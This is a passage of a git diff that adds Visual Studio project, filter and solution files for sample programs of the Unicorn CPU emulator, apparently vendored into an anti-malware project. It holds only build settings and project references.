<ExceptionHandling>false</ExceptionHandling> + <DebugInformationFormat>None</DebugInformationFormat> + </ClCompile> + <Link> + <SubSystem>Console</SubSystem> + <GenerateDebugInformation>true</GenerateDebugInformation> + <EnableCOMDATFolding>true</EnableCOMDATFolding> + <OptimizeReferences>true</OptimizeReferences> + <AdditionalLibraryDirectories>$(SolutionDir)$(Platform)\$(Configuration)\</AdditionalLibraryDirectories> + <AdditionalDependencies>kernel32.lib;user32.lib;gdi32.lib;winspool.lib;comdlg32.lib;advapi32.lib;shell32.lib;ole32.lib;oleaut32.lib;uuid.lib;odbc32.lib;odbccp32.lib;%(AdditionalDependencies);unicorn_static.lib</AdditionalDependencies> + </Link> + <PreBuildEvent> + <Command> + </Command> + </PreBuildEvent> + </ItemDefinitionGroup> + <ItemGroup> + <ClCompile Include="..\..\..\samples\sample_x86.c" /> + </ItemGroup> + <Import Project="$(VCTargetsPath)\Microsoft.Cpp.targets" /> + <ImportGroup Label="ExtensionTargets"> + </ImportGroup> +</Project> \ No newline at end of file diff --git a/ai_anti_malware/unicorn/unicorn-master/msvc/samples/sample_x86/sample_x86.vcxproj.filters b/ai_anti_malware/unicorn/unicorn-master/msvc/samples/sample_x86/sample_x86.vcxproj.filters new file mode 100644 index 0000000..dd731b2 --- /dev/null +++ b/ai_anti_malware/unicorn/unicorn-master/msvc/samples/sample_x86/sample_x86.vcxproj.filters @@ -0,0 +1,6 @@ +<?xml version="1.0" encoding="utf-8"?> +<Project ToolsVersion="4.0" xmlns="http://schemas.microsoft.com/developer/msbuild/2003"> + <ItemGroup> + <ClCompile Include="..\..\..\samples\sample_x86.c" /> + </ItemGroup> +</Project> \ No newline at end of file diff --git a/ai_anti_malware/unicorn/unicorn-master/msvc/samples/sample_x86_32_gdt_and_seg_regs/sample_x86_32_gdt_and_seg_regs.vcxproj b/ai_anti_malware/unicorn/unicorn-master/msvc/samples/sample_x86_32_gdt_and_seg_regs/sample_x86_32_gdt_and_seg_regs.vcxproj new file mode 100644 index 0000000..2600557 --- /dev/null +++ b/ai_anti_malware/unicorn/unicorn-master/msvc/samples/sample_x86_32_gdt_and_seg_regs/sample_x86_32_gdt_and_seg_regs.vcxproj @@ -0,0 +1,176 @@ +<?xml version="1.0" encoding="utf-8"?> +<Project DefaultTargets="Build" ToolsVersion="4.0" xmlns="http://schemas.microsoft.com/developer/msbuild/2003"> + <ItemGroup Label="ProjectConfigurations"> + <ProjectConfiguration Include="Debug|Win32"> + <Configuration>Debug</Configuration> + <Platform>Win32</Platform> + </ProjectConfiguration> + <ProjectConfiguration Include="Debug|x64"> + <Configuration>Debug</Configuration> + <Platform>x64</Platform> + </ProjectConfiguration> + <ProjectConfiguration Include="Release|Win32"> + <Configuration>Release</Configuration> + <Platform>Win32</Platform> + </ProjectConfiguration> + <ProjectConfiguration Include="Release|x64"> + <Configuration>Release</Configuration> + <Platform>x64</Platform> + </ProjectConfiguration> + </ItemGroup> + <PropertyGroup Label="Globals"> + <ProjectGuid>{9D96D09A-DE17-4011-9247-F0009E8D6DB5}</ProjectGuid> + <Keyword>Win32Proj</Keyword> + <RootNamespace>sample_x86_32_gdt_and_seg_regs</RootNamespace> + </PropertyGroup> + <Import Project="$(VCTargetsPath)\Microsoft.Cpp.Default.props" /> + <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'" Label="Configuration"> + <ConfigurationType>Application</ConfigurationType> + <UseDebugLibraries>true</UseDebugLibraries> + <PlatformToolset>$(DefaultPlatformToolset)</PlatformToolset> + <CharacterSet>MultiByte</CharacterSet> + </PropertyGroup> + <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Debug|x64'" Label="Configuration"> + <ConfigurationType>Application</ConfigurationType> + <UseDebugLibraries>true</UseDebugLibraries> + <PlatformToolset>$(DefaultPlatformToolset)</PlatformToolset> + <CharacterSet>MultiByte</CharacterSet> + </PropertyGroup> + <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Release|Win32'" Label="Configuration"> + <ConfigurationType>Application</ConfigurationType> + <UseDebugLibraries>false</UseDebugLibraries> + <PlatformToolset>$(DefaultPlatformToolset)</PlatformToolset> + <WholeProgramOptimization>true</WholeProgramOptimization> + <CharacterSet>MultiByte</CharacterSet> + </PropertyGroup> + <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Release|x64'" Label="Configuration"> + <ConfigurationType>Application</ConfigurationType> + <UseDebugLibraries>false</UseDebugLibraries> + <PlatformToolset>$(DefaultPlatformToolset)</PlatformToolset> + <WholeProgramOptimization>true</WholeProgramOptimization> + <CharacterSet>MultiByte</CharacterSet> + <SpectreMitigation>false</SpectreMitigation> + </PropertyGroup> + <Import Project="$(VCTargetsPath)\Microsoft.Cpp.props" /> + <ImportGroup Label="ExtensionSettings"> + </ImportGroup> + <ImportGroup Label="PropertySheets" Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'"> + <Import Project="$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props" Condition="exists('$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props')" Label="LocalAppDataPlatform" /> + </ImportGroup> + <ImportGroup Condition="'$(Configuration)|$(Platform)'=='Debug|x64'" Label="PropertySheets"> + <Import Project="$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props" Condition="exists('$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props')" Label="LocalAppDataPlatform" /> + </ImportGroup> + <ImportGroup Label="PropertySheets" Condition="'$(Configuration)|$(Platform)'=='Release|Win32'"> + <Import Project="$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props" Condition="exists('$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props')" Label="LocalAppDataPlatform" /> + </ImportGroup> + <ImportGroup Condition="'$(Configuration)|$(Platform)'=='Release|x64'" Label="PropertySheets"> + <Import Project="$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props" Condition="exists('$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props')" Label="LocalAppDataPlatform" /> + </ImportGroup> + <PropertyGroup Label="UserMacros" /> + <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'"> + <LinkIncremental>true</LinkIncremental> + <OutDir>$(SolutionDir)$(Platform)\$(Configuration)\</OutDir> + <IntDir>$(ProjectDir)$(Platform)\$(Configuration)\</IntDir> + </PropertyGroup> + <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Debug|x64'"> + <LinkIncremental>true</LinkIncremental> + <IntDir>$(ProjectDir)$(Platform)\$(Configuration)\</IntDir> + </PropertyGroup> + <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Release|Win32'"> + <LinkIncremental>false</LinkIncremental> + <OutDir>$(SolutionDir)$(Platform)\$(Configuration)\</OutDir> + <IntDir>$(ProjectDir)$(Platform)\$(Configuration)\</IntDir> + </PropertyGroup> + <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Release|x64'"> + <LinkIncremental>false</LinkIncremental> + <IntDir>$(ProjectDir)$(Platform)\$(Configuration)\</IntDir> + </PropertyGroup> + <ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'"> + <ClCompile> + <PrecompiledHeader> + </PrecompiledHeader> + <WarningLevel>Level3</WarningLevel> + <Optimization>Disabled</Optimization> + <PreprocessorDefinitions>WIN32;_DEBUG;_CONSOLE;%(PreprocessorDefinitions);_CRT_SECURE_NO_WARNINGS;__i386__</PreprocessorDefinitions> + <AdditionalIncludeDirectories>../../../include</AdditionalIncludeDirectories> + <ExceptionHandling>false</ExceptionHandling> + <RuntimeLibrary>MultiThreadedDebug</RuntimeLibrary> + </ClCompile> + <Link> + <SubSystem>Console</SubSystem> + <GenerateDebugInformation>true</GenerateDebugInformation> + <AdditionalLibraryDirectories>$(SolutionDir)$(Platform)\$(Configuration)\</AdditionalLibraryDirectories> + <AdditionalDependencies>kernel32.lib;user32.lib;gdi32.lib;winspool.lib;comdlg32.lib;advapi32.lib;shell32.lib;ole32.lib;oleaut32.lib;uuid.lib;odbc32.lib;odbccp32.lib;%(AdditionalDependencies);unicorn_static.lib</AdditionalDependencies> + </Link> + </ItemDefinitionGroup> + <ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Debug|x64'"> + <ClCompile> + <PrecompiledHeader> + </PrecompiledHeader> + <WarningLevel>Level3</WarningLevel> + <Optimization>Disabled</Optimization> + <PreprocessorDefinitions>WIN32;_DEBUG;_CONSOLE;%(PreprocessorDefinitions);_CRT_SECURE_NO_WARNINGS;__i386__</PreprocessorDefinitions> + <AdditionalIncludeDirectories>../../../include</AdditionalIncludeDirectories> + <ExceptionHandling>false</ExceptionHandling> + <RuntimeLibrary>MultiThreadedDebug</RuntimeLibrary> + </ClCompile> + <Link> + <SubSystem>Console</SubSystem> + <GenerateDebugInformation>true</GenerateDebugInformation> + <AdditionalLibraryDirectories>$(SolutionDir)$(Platform)\$(Configuration)\</AdditionalLibraryDirectories> + <AdditionalDependencies>kernel32.lib;user32.lib;gdi32.lib;winspool.lib;comdlg32.lib;advapi32.lib;shell32.lib;ole32.lib;oleaut32.lib;uuid.lib;odbc32.lib;odbccp32.lib;%(AdditionalDependencies);unicorn_static.lib</AdditionalDependencies> + </Link> + </ItemDefinitionGroup> + <ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Release|Win32'"> + <ClCompile> + <WarningLevel>Level3</WarningLevel> + <PrecompiledHeader> + </PrecompiledHeader> + <Optimization>MaxSpeed</Optimization> + <FunctionLevelLinking>true</FunctionLevelLinking> + <IntrinsicFunctions>true</IntrinsicFunctions> + <PreprocessorDefinitions>WIN32;NDEBUG;_CONSOLE;%(PreprocessorDefinitions);_CRT_SECURE_NO_WARNINGS;__i386__</PreprocessorDefinitions> + <AdditionalIncludeDirectories>../../../include</AdditionalIncludeDirectories> + <ExceptionHandling>false</ExceptionHandling> + <RuntimeLibrary>MultiThreaded</RuntimeLibrary> + <DebugInformationFormat>None</DebugInformationFormat> + </ClCompile> + <Link> + <SubSystem>Console</SubSystem> + <GenerateDebugInformation>true</GenerateDebugInformation> + <EnableCOMDATFolding>true</EnableCOMDATFolding> + <OptimizeReferences>true</OptimizeReferences> + <AdditionalLibraryDirectories>$(SolutionDir)$(Platform)\$(Configuration)\</AdditionalLibraryDirectories> + <AdditionalDependencies>kernel32.lib;user32.lib;gdi32.lib;winspool.lib;comdlg32.lib;advapi32.lib;shell32.lib;ole32.lib;oleaut32.lib;uuid.lib;odbc32.lib;odbccp32.lib;%(AdditionalDependencies);unicorn_static.lib</AdditionalDependencies> + </Link> + </ItemDefinitionGroup> + <ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Release|x64'"> + <ClCompile> + <WarningLevel>Level3</WarningLevel> + <PrecompiledHeader> + </PrecompiledHeader> + <Optimization>MaxSpeed</Optimization> + <FunctionLevelLinking>true</FunctionLevelLinking> + <IntrinsicFunctions>true</IntrinsicFunctions> + <PreprocessorDefinitions>WIN32;NDEBUG;_CONSOLE;%(PreprocessorDefinitions);_CRT_SECURE_NO_WARNINGS;__i386__</PreprocessorDefinitions> + <AdditionalIncludeDirectories>../../../include</AdditionalIncludeDirectories> + <ExceptionHandling>false</ExceptionHandling> + <RuntimeLibrary>MultiThreaded</RuntimeLibrary> + <DebugInformationFormat>None</DebugInformationFormat> + </ClCompile> + <Link> + <SubSystem>Console</SubSystem> + <GenerateDebugInformation>true</GenerateDebugInformation> + <EnableCOMDATFolding>true</EnableCOMDATFolding> + <OptimizeReferences>true</OptimizeReferences> + <AdditionalLibraryDirectories>$(SolutionDir)$(Platform)\$(Configuration)\</AdditionalLibraryDirectories> + <AdditionalDependencies>kernel32.lib;user32.lib;gdi32.lib;winspool.lib;comdlg32.lib;advapi32.lib;shell32.lib;ole32.lib;oleaut32.lib;uuid.lib;odbc32.lib;odbccp32.lib;%(AdditionalDependencies);unicorn_static.lib</AdditionalDependencies> + </Link> + </ItemDefinitionGroup> + <ItemGroup> + <ClCompile Include="..\..\..\samples\sample_x86_32_gdt_and_seg_regs.c" /> + </ItemGroup> + <Import Project="$(VCTargetsPath)\Microsoft.Cpp.targets" /> + <ImportGroup Label="ExtensionTargets"> + </ImportGroup> +</Project> \ No newline at end of file diff --git a/ai_anti_malware/unicorn/unicorn-master/msvc/samples/sample_x86_32_gdt_and_seg_regs/sample_x86_32_gdt_and_seg_regs.vcxproj.filters b/ai_anti_malware/unicorn/unicorn-master/msvc/samples/sample_x86_32_gdt_and_seg_regs/sample_x86_32_gdt_and_seg_regs.vcxproj.filters new file mode 100644 index 0000000..960616d --- /dev/null +++ b/ai_anti_malware/unicorn/unicorn-master/msvc/samples/sample_x86_32_gdt_and_seg_regs/sample_x86_32_gdt_and_seg_regs.vcxproj.filters @@ -0,0 +1,6 @@ +<?xml version="1.0" encoding="utf-8"?> +<Project ToolsVersion="4.0" xmlns="http://schemas.microsoft.com/developer/msbuild/2003"> + <ItemGroup> + <ClCompile Include="..\..\..\samples\sample_x86_32_gdt_and_seg_regs.c" /> + </ItemGroup> +</Project> \ No newline at end of file diff --git a/ai_anti_malware/unicorn/unicorn-master/msvc/samples/shellcode/shellcode.vcxproj b/ai_anti_malware/unicorn/unicorn-master/msvc/samples/shellcode/shellcode.vcxproj new file mode 100644 index 0000000..2ecad9d --- /dev/null +++ b/ai_anti_malware/unicorn/unicorn-master/msvc/samples/shellcode/shellcode.vcxproj @@ -0,0 +1,176 @@ +<?xml version="1.0" encoding="utf-8"?> +<Project DefaultTargets="Build" ToolsVersion="4.0" xmlns="http://schemas.microsoft.com/developer/msbuild/2003"> + <ItemGroup Label="ProjectConfigurations"> + <ProjectConfiguration Include="Debug|Win32"> + <Configuration>Debug</Configuration> + <Platform>Win32</Platform> + </ProjectConfiguration> + <ProjectConfiguration Include="Debug|x64"> + <Configuration>Debug</Configuration> + <Platform>x64</Platform> + </ProjectConfiguration> + <ProjectConfiguration Include="Release|Win32"> + <Configuration>Release</Configuration> + <Platform>Win32</Platform> + </ProjectConfiguration> + <ProjectConfiguration Include="Release|x64"> + <Configuration>Release</Configuration> + <Platform>x64</Platform> + </ProjectConfiguration> + </ItemGroup> + <ItemGroup> + <ClCompile Include="..\..\..\samples\shellcode.c" /> + </ItemGroup> + <PropertyGroup Label="Globals"> + <ProjectGuid>{F113B460-4B21-4014-9A15-D472FAA9E3F9}</ProjectGuid> + <Keyword>Win32Proj</Keyword> + <RootNamespace>shellcode</RootNamespace> + </PropertyGroup> + <Import Project="$(VCTargetsPath)\Microsoft.Cpp.Default.props" /> + <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'" Label="Configuration"> + <ConfigurationType>Application</ConfigurationType> + <UseDebugLibraries>true</UseDebugLibraries> + <PlatformToolset>$(DefaultPlatformToolset)</PlatformToolset> + <CharacterSet>MultiByte</CharacterSet> + </PropertyGroup> + <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Debug|x64'" Label="Configuration"> + <ConfigurationType>Application</ConfigurationType> + <UseDebugLibraries>true</UseDebugLibraries> + <PlatformToolset>$(DefaultPlatformToolset)</PlatformToolset> + <CharacterSet>MultiByte</CharacterSet> + </PropertyGroup> + <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Release|Win32'" Label="Configuration"> + <ConfigurationType>Application</ConfigurationType> + <UseDebugLibraries>false</UseDebugLibraries> + <PlatformToolset>$(DefaultPlatformToolset)</PlatformToolset> + <WholeProgramOptimization>true</WholeProgramOptimization> + <CharacterSet>MultiByte</CharacterSet> + </PropertyGroup> + <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Release|x64'" Label="Configuration"> + <ConfigurationType>Application</ConfigurationType> + <UseDebugLibraries>false</UseDebugLibraries> + <PlatformToolset>$(DefaultPlatformToolset)</PlatformToolset> + <WholeProgramOptimization>true</WholeProgramOptimization> + <CharacterSet>MultiByte</CharacterSet> + <SpectreMitigation>false</SpectreMitigation> + </PropertyGroup> + <Import Project="$(VCTargetsPath)\Microsoft.Cpp.props" /> + <ImportGroup Label="ExtensionSettings"> + </ImportGroup> + <ImportGroup Label="PropertySheets" Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'"> + <Import Project="$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props" Condition="exists('$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props')" Label="LocalAppDataPlatform" /> + </ImportGroup> + <ImportGroup Condition="'$(Configuration)|$(Platform)'=='Debug|x64'" Label="PropertySheets"> + <Import Project="$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props" Condition="exists('$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props')" Label="LocalAppDataPlatform" /> + </ImportGroup> + <ImportGroup Label="PropertySheets" Condition="'$(Configuration)|$(Platform)'=='Release|Win32'"> + <Import Project="$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props" Condition="exists('$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props')" Label="LocalAppDataPlatform" /> + </ImportGroup> + <ImportGroup Condition="'$(Configuration)|$(Platform)'=='Release|x64'" Label="PropertySheets"> + <Import Project="$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props" Condition="exists('$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props')" Label="LocalAppDataPlatform" /> + </ImportGroup> + <PropertyGroup Label="UserMacros" /> + <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'"> + <LinkIncremental>true</LinkIncremental> + <OutDir>$(SolutionDir)$(Platform)\$(Configuration)\</OutDir> + <IntDir>$(ProjectDir)$(Platform)\$(Configuration)\</IntDir> + </PropertyGroup> + <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Debug|x64'"> + <LinkIncremental>true</LinkIncremental> + <IntDir>$(ProjectDir)$(Platform)\$(Configuration)\</IntDir> + </PropertyGroup> + <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Release|Win32'"> + <LinkIncremental>false</LinkIncremental> + <OutDir>$(SolutionDir)$(Platform)\$(Configuration)\</OutDir> + <IntDir>$(ProjectDir)$(Platform)\$(Configuration)\</IntDir> + </PropertyGroup> + <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Release|x64'"> + <LinkIncremental>false</LinkIncremental> + <IntDir>$(ProjectDir)$(Platform)\$(Configuration)\</IntDir> + </PropertyGroup> + <ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'"> + <ClCompile> + <PrecompiledHeader> + </PrecompiledHeader> + <WarningLevel>Level3</WarningLevel> + <Optimization>Disabled</Optimization> + <PreprocessorDefinitions>WIN32;_DEBUG;_CONSOLE;%(PreprocessorDefinitions);_CRT_SECURE_NO_WARNINGS;__i386__</PreprocessorDefinitions> + <AdditionalIncludeDirectories>../../../include</AdditionalIncludeDirectories> + <ExceptionHandling>false</ExceptionHandling> + <RuntimeLibrary>MultiThreadedDebug</RuntimeLibrary> + </ClCompile> + <Link> + <SubSystem>Console</SubSystem> + <GenerateDebugInformation>true</GenerateDebugInformation> + <AdditionalLibraryDirectories>$(SolutionDir)$(Platform)\$(Configuration)\</AdditionalLibraryDirectories> + <AdditionalDependencies>kernel32.lib;user32.lib;gdi32.lib;winspool.lib;comdlg32.lib;advapi32.lib;shell32.lib;ole32.lib;oleaut32.lib;uuid.lib;odbc32.lib;odbccp32.lib;%(AdditionalDependencies);unicorn_static.lib</AdditionalDependencies> + </Link> + </ItemDefinitionGroup> + <ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Debug|x64'"> + <ClCompile> + <PrecompiledHeader> + </PrecompiledHeader> + <WarningLevel>Level3</WarningLevel> + <Optimization>Disabled</Optimization> + <PreprocessorDefinitions>WIN32;_DEBUG;_CONSOLE;%(PreprocessorDefinitions);_CRT_SECURE_NO_WARNINGS;__i386__</PreprocessorDefinitions> + <AdditionalIncludeDirectories>../../../include</AdditionalIncludeDirectories> + <ExceptionHandling>false</ExceptionHandling> + <RuntimeLibrary>MultiThreadedDebug</RuntimeLibrary> + </ClCompile> + <Link> + <SubSystem>Console</SubSystem> + <GenerateDebugInformation>true</GenerateDebugInformation> + <AdditionalLibraryDirectories>$(SolutionDir)$(Platform)\$(Configuration)\</AdditionalLibraryDirectories> + <AdditionalDependencies>kernel32.lib;user32.lib;gdi32.lib;winspool.lib;comdlg32.lib;advapi32.lib;shell32.lib;ole32.lib;oleaut32.lib;uuid.lib;odbc32.lib;odbccp32.lib;%(AdditionalDependencies);unicorn_static.lib</AdditionalDependencies> + </Link> + </ItemDefinitionGroup> + <ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Release|Win32'"> + <ClCompile> + <WarningLevel>Level3</WarningLevel> + <PrecompiledHeader> + </PrecompiledHeader> + <Optimization>MaxSpeed</Optimization> + <FunctionLevelLinking>true</FunctionLevelLinking> + <IntrinsicFunctions>true</IntrinsicFunctions> + <PreprocessorDefinitions>WIN32;NDEBUG;_CONSOLE;%(PreprocessorDefinitions);_CRT_SECURE_NO_WARNINGS;__i386__</PreprocessorDefinitions> + <AdditionalIncludeDirectories>../../../include</AdditionalIncludeDirectories> + <ExceptionHandling>false</ExceptionHandling> + <RuntimeLibrary>MultiThreaded</RuntimeLibrary> + <DebugInformationFormat>None</DebugInformationFormat> + </ClCompile> + <Link> + <SubSystem>Console</SubSystem> + <GenerateDebugInformation>true</GenerateDebugInformation> + <EnableCOMDATFolding>true</EnableCOMDATFolding> + <OptimizeReferences>true</OptimizeReferences> + <AdditionalLibraryDirectories>$(SolutionDir)$(Platform)\$(Configuration)\</AdditionalLibraryDirectories> + <AdditionalDependencies>kernel32.lib;user32.lib;gdi32.lib;winspool.lib;comdlg32.lib;advapi32.lib;shell32.lib;ole32.lib;oleaut32.lib;uuid.lib;odbc32.lib;odbccp32.lib;%(AdditionalDependencies);unicorn_static.lib</AdditionalDependencies> + </Link> + </ItemDefinitionGroup> + <ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Release|x64'"> + <ClCompile> + <WarningLevel>Level3</WarningLevel> + <PrecompiledHeader> + </PrecompiledHeader> + <Optimization>MaxSpeed</Optimization> + <FunctionLevelLinking>true</FunctionLevelLinking> + <IntrinsicFunctions>true</IntrinsicFunctions> + <PreprocessorDefinitions>WIN32;NDEBUG;_CONSOLE;%(PreprocessorDefinitions);_CRT_SECURE_NO_WARNINGS;__i386__</PreprocessorDefinitions> + <AdditionalIncludeDirectories>../../../include</AdditionalIncludeDirectories> + <ExceptionHandling>false</ExceptionHandling> + <RuntimeLibrary>MultiThreaded</RuntimeLibrary> + <DebugInformationFormat>None</DebugInformationFormat> + </ClCompile> + <Link> + <SubSystem>Console</SubSystem> + <GenerateDebugInformation>true</GenerateDebugInformation> + <EnableCOMDATFolding>true</EnableCOMDATFolding> + <OptimizeReferences>true</OptimizeReferences> + <AdditionalLibraryDirectories>$(SolutionDir)$(Platform)\$(Configuration)\</AdditionalLibraryDirectories> + <AdditionalDependencies>kernel32.lib;user32.lib;gdi32.lib;winspool.lib;comdlg32.lib;advapi32.lib;shell32.lib;ole32.lib;oleaut32.lib;uuid.lib;odbc32.lib;odbccp32.lib;%(AdditionalDependencies);unicorn_static.lib</AdditionalDependencies> + </Link> + </ItemDefinitionGroup> + <Import Project="$(VCTargetsPath)\Microsoft.Cpp.targets" /> + <ImportGroup Label="ExtensionTargets"> + </ImportGroup> +</Project> \ No newline at end of file diff --git a/ai_anti_malware/unicorn/unicorn-master/msvc/samples/shellcode/shellcode.vcxproj.filters b/ai_anti_malware/unicorn/unicorn-master/msvc/samples/shellcode/shellcode.vcxproj.filters new file mode 100644 index 0000000..1f571b6 --- /dev/null +++ b/ai_anti_malware/unicorn/unicorn-master/msvc/samples/shellcode/shellcode.vcxproj.filters @@ -0,0 +1,6 @@ +<?xml version="1.0" encoding="utf-8"?> +<Project ToolsVersion="4.0" xmlns="http://schemas.microsoft.com/developer/msbuild/2003"> + <ItemGroup> + <ClCompile Include="..\..\..\samples\shellcode.c" /> + </ItemGroup> +</Project> \ No newline at end of file diff --git a/ai_anti_malware/unicorn/unicorn-master/msvc/unicorn.sln b/ai_anti_malware/unicorn/unicorn-master/msvc/unicorn.sln new file mode 100644 index 0000000..03da775 --- /dev/null +++ b/ai_anti_malware/unicorn/unicorn-master/msvc/unicorn.sln @@ -0,0 +1,370 @@ + +Microsoft Visual Studio Solution File, Format Version 12.00 +# Visual Studio 2012 +Project("{8BC9CEB8-8B4A-11D0-8D11-00A0C91BC942}") = "unicorn", "unicorn\unicorn\unicorn.vcxproj", "{ACB78BBB-E8F4-4EAD-B981-9C6155DE100B}" + ProjectSection(ProjectDependencies) = postProject + {740F3007-7BF0-4C0C-8FA5-2587C794EF31} = {740F3007-7BF0-4C0C-8FA5-2587C794EF31} + {006A7908-ABF3-4D18-BC35-0A29E39B95F9} = {006A7908-ABF3-4D18-BC35-0A29E39B95F9} + {63050112-E486-4396-B5E4-303C3BC12D39} = {63050112-E486-4396-B5E4-303C3BC12D39} + {8804AD29-E398-480C-AC0F-98EC1B7A51CB} = {8804AD29-E398-480C-AC0F-98EC1B7A51CB} + {2A7F483F-CD19-4F84-BBDA-B6A1865E2773} = {2A7F483F-CD19-4F84-BBDA-B6A1865E2773} + {2C5AD347-6E34-463B-8289-00578E43B255} = {2C5AD347-6E34-463B-8289-00578E43B255} + {4A9F9353-DB63-460A-BB1C-9CB519DFD414} = {4A9F9353-DB63-460A-BB1C-9CB519DFD414} + {698C2D54-475C-446F-B879-F629BBEF75FE} = {698C2D54-475C-446F-B879-F629BBEF75FE} + {17077E86-AE7C-41AF-86ED-2BAC03B019BC} = {17077E86-AE7C-41AF-86ED-2BAC03B019BC} + {4478909E-6983-425C-9D9F-558CF258E61E} = {4478909E-6983-425C-9D9F-558CF258E61E} + {340D86A5-E53C-490B-880A-8EB1F5BDE947} = {340D86A5-E53C-490B-880A-8EB1F5BDE947} + {F67EB1EA-DCFA-4758-A2AA-4B570BA78036} = {F67EB1EA-DCFA-4758-A2AA-4B570BA78036} + EndProjectSection +EndProject +Project("{8BC9CEB8-8B4A-11D0-8D11-00A0C91BC942}") = "unicorn_static", "unicorn\unicorn_static\unicorn_static.vcxproj", "{B6EFD6D7-C2D4-4FBB-B363-2E08CE09CC96}" + ProjectSection(ProjectDependencies) = postProject + {740F3007-7BF0-4C0C-8FA5-2587C794EF31} = {740F3007-7BF0-4C0C-8FA5-2587C794EF31} + {006A7908-ABF3-4D18-BC35-0A29E39B95F9} = {006A7908-ABF3-4D18-BC35-0A29E39B95F9} + {63050112-E486-4396-B5E4-303C3BC12D39} = {63050112-E486-4396-B5E4-303C3BC12D39} + {8804AD29-E398-480C-AC0F-98EC1B7A51CB} = {8804AD29-E398-480C-AC0F-98EC1B7A51CB} + {2A7F483F-CD19-4F84-BBDA-B6A1865E2773} = {2A7F483F-CD19-4F84-BBDA-B6A1865E2773} + {2C5AD347-6E34-463B-8289-00578E43B255} = {2C5AD347-6E34-463B-8289-00578E43B255} + {4A9F9353-DB63-460A-BB1C-9CB519DFD414} = {4A9F9353-DB63-460A-BB1C-9CB519DFD414} + {698C2D54-475C-446F-B879-F629BBEF75FE} = {698C2D54-475C-446F-B879-F629BBEF75FE} + {17077E86-AE7C-41AF-86ED-2BAC03B019BC} = {17077E86-AE7C-41AF-86ED-2BAC03B019BC} + {4478909E-6983-425C-9D9F-558CF258E61E} = {4478909E-6983-425C-9D9F-558CF258E61E} + {340D86A5-E53C-490B-880A-8EB1F5BDE947} = {340D86A5-E53C-490B-880A-8EB1F5BDE947} + {F67EB1EA-DCFA-4758-A2AA-4B570BA78036} = {F67EB1EA-DCFA-4758-A2AA-4B570BA78036} + EndProjectSection +EndProject +Project("{2150E333-8FDC-42A3-9474-1A3956D46DE8}") = "softmmu", "softmmu", "{857A09AF-FE20-461C-B66F-D779422AD46B}" +EndProject +Project("{8BC9CEB8-8B4A-11D0-8D11-00A0C91BC942}") = "aarch64-softmmu", "unicorn\aarch64-softmmu\aarch64-softmmu.vcxproj", "{2A7F483F-CD19-4F84-BBDA-B6A1865E2773}" +EndProject +Project("{8BC9CEB8-8B4A-11D0-8D11-00A0C91BC942}") = "arm-softmmu", "unicorn\arm-softmmu\arm-softmmu.vcxproj", "{F67EB1EA-DCFA-4758-A2AA-4B570BA78036}" +EndProject +Project("{8BC9CEB8-8B4A-11D0-8D11-00A0C91BC942}") = "armeb-softmmu", "unicorn\armeb-softmmu\armeb-softmmu.vcxproj", "{740F3007-7BF0-4C0C-8FA5-2587C794EF31}" +EndProject +Project("{8BC9CEB8-8B4A-11D0-8D11-00A0C91BC942}") = "m68k-softmmu", "unicorn\m68k-softmmu\m68k-softmmu.vcxproj", "{2C5AD347-6E34-463B-8289-00578E43B255}" +EndProject +Project("{8BC9CEB8-8B4A-11D0-8D11-00A0C91BC942}") = "mips-softmmu", "unicorn\mips-softmmu\mips-softmmu.vcxproj", "{63050112-E486-4396-B5E4-303C3BC12D39}" +EndProject +Project("{8BC9CEB8-8B4A-11D0-8D11-00A0C91BC942}") = "mips64-softmmu", "unicorn\mips64-softmmu\mips64-softmmu.vcxproj", "{4A9F9353-DB63-460A-BB1C-9CB519DFD414}" +EndProject +Project("{8BC9CEB8-8B4A-11D0-8D11-00A0C91BC942}") = "mips64el-softmmu", "unicorn\mips64el-softmmu\mips64el-softmmu.vcxproj", "{4478909E-6983-425C-9D9F-558CF258E61E}" +EndProject +Project("{8BC9CEB8-8B4A-11D0-8D11-00A0C91BC942}") = "mipsel-softmmu", "unicorn\mipsel-softmmu\mipsel-softmmu.vcxproj", "{006A7908-ABF3-4D18-BC35-0A29E39B95F9}" +EndProject +Project("{8BC9CEB8-8B4A-11D0-8D11-00A0C91BC942}") = "sparc-softmmu", 